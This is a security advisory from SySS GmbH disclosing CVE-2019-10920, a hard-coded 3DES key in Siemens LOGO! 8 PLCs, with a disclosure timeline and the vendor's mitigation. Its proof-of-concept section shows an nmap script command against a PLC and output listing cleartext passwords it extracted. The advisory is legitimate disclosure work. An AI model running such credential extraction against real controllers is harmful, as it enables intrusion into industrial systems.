Share
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2019-012  
Product: LOGO!  
Manufacturer: Siemens  
Affected Version(s): LOGO! 8 (all versions)  
Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03  
Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)  
Risk Level: High  
Solution Status: Open  
Manufacturer Notification: 2019-04-04  
Solution Date: 2019-05-14 (recommended mitigation by manufacturer)  
Public Disclosure: 2019-05-29  
CVE Reference: CVE-2019-10920  
Authors of Advisory: Manuel Stotz, Matthias Deeg (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
Siemens LOGO! is a programmable logic controller (PLC) for small  
automation tasks.  
  
The manufacturer describes the product as follows (see [1]):  
  
"Simple installation, minimum wiring, user-friendly programming: You can  
easily implement small automation projects with LOGO!, the intelligent  
logic module from Siemens. The LOGO! Logic Module saves space in the  
control cabinet, and lets you easily implement functions, such as  
time-delay switches, time relays, counters and auxiliary relays. "  
  
Due to the use of a hard-coded cryptographic key, an attacker can put  
the integrity and confidentiality of encrypted data of all LOGO! 8 PLCs  
using this key at risk, for instance decrypting network communication  
during a man-in-the-middle attack.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
SySS GmbH found out that LOGO! PLCs use a static, hard-coded  
cryptographic 3DES key for protecting sensitive information, like  
network communication and configuration data.  
  
For instance, this key can be found within the LOGO! Soft Comfort  
software.  
  
By knowing this static cryptographic 3DES key, an attacker can decrypt  
all LOGO! data that is encrypted with this key and gain access to  
sensitive data, for instance different configured passwords.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
SySS GmbH used the hard-coded cryptographic 3DES key in a software tool  
(Nmap script) for extracting sensitive data such as configured passwords  
as cleartext.  
  
The following Nmap output exemplarily shows extracting password data  
from a LOGO! 8 PLC:  
  
$ nmap -p 10005 --script slig.nse 192.168.10.112  
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-04 09:35 CEST  
Nmap scan report for 192.168.10.112  
Host is up (0.00044s latency).  
  
PORT STATE SERVICE  
10005/tcp open stel  
| slig: Gathered Siemens LOGO!8 access details and passwords  
| User: LSCUser  
| Password: S3cret1  
| Enabled: True  
| User: AppUser  
| Password: S3cret2  
| Enabled: True  
| User: WebUser  
| Password: S3cret3  
| Enabled: True  
| User: TDUser  
| Password: S3cret4  
| Enabled: True  
| Protection: Password  
| Program password: SECRET  
|_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00  
  
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds  
  
A successful attack against a LOGO! 8 extracting all configured  
passwords is demonstrated in our SySS PoC video [5].  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
In the publicly released Siemens Security Advisory SSA-542701 [3],  
the manufacturer Siemens recommends to apply a defense-in-depth concept,  
including protection concept outlined in the system manual, as a  
mitigation for reducing the risk of the described security issue.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2019-04-04: Vulnerability reported to manufacturer  
2019-04-04: Manufacturer confirms receipt of security advisory and  
asks for referenced Nmap script  
2019-04-04: SySS provides PoC Nmap script  
2019-05-14: Public release of Siemens Security Advisory SSA-542701  
2019-05-29: Public release of SySS security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for Siemens LOGO!  
https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html  
[2] SySS Security Advisory SYSS-2019-012  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-012.txt  
[3] Siemens Security Advisory SSA-542701  
https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf  
[4] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy/  
[5] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking"  
https://youtu.be/TpH4EABGYCs  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Manuel Stotz of SySS GmbH.  
  
E-Mail: manuel.stotz (at) syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc  
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web   
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEE0fCgNfBs5nXNuQUU2aS/ajStTasFAlztdqYACgkQ2aS/ajSt  
TasISA//dtwHnSZdvACoHTD0pVUb5E/z5fzEWHp3YTJX3kUpQAokN9QVtdI1H02x  
qyVq+72zeXifOBPVlvlX3JNBPDkYzYUzdR5idH7WuApdQ/FdKFw8Nv292oTib+OL  
zP4NxysKCkgAWhTWL5YZTioFUUB3W36rohEK2W2qfCqzUOEjhLmCdcnGv4PTgvU0  
uW7LOFPC/GvCuV1KfluwOREyleX3X1LNpmJjW3W1ZQ3l1plwAHLGrCXJm+78b/Vi  
Xm9B/GhCfdcPsvHo/EJwAJG7RUAHKjBtUybPSujNj3Dv04W5X6tPDUjkuqfNgROZ  
BSqn1tp8GRh8tKns22/lAkW8bJqSbTW3R/DqXh5yRUPVM0wdo24IGDEChZOt4sMM  
UP9AVY3IJI7KaqZTRFSZC2x3IdSCcNdUNstgzeJNaZLESt29krYGpRv1JLx2yFeV  
14qMQUYl7X1uyLA499HRYaRoxUwo7jGOiABIv7US+HaLusXQ/+lp5spSdFy+VxEd  
blVnM0HXW3XAo3CM0T5xtPuHtEgvdLuZCtsAkG2rAU/Q95B93YrCd2WOQaH2Czgd  
y74XQdJ3O6sGGCSwVa+SWpA/3BJMAu2CKpqLJLnK/os9z9Z5q62/8s4KP86L/U6X  
mGWtQbe5s8Z+ikpXm1Ey7AqFrWftQYn4Ujiv/H4SjrgJBMTZAHk=  
=1IGg  
-----END PGP SIGNATURE-----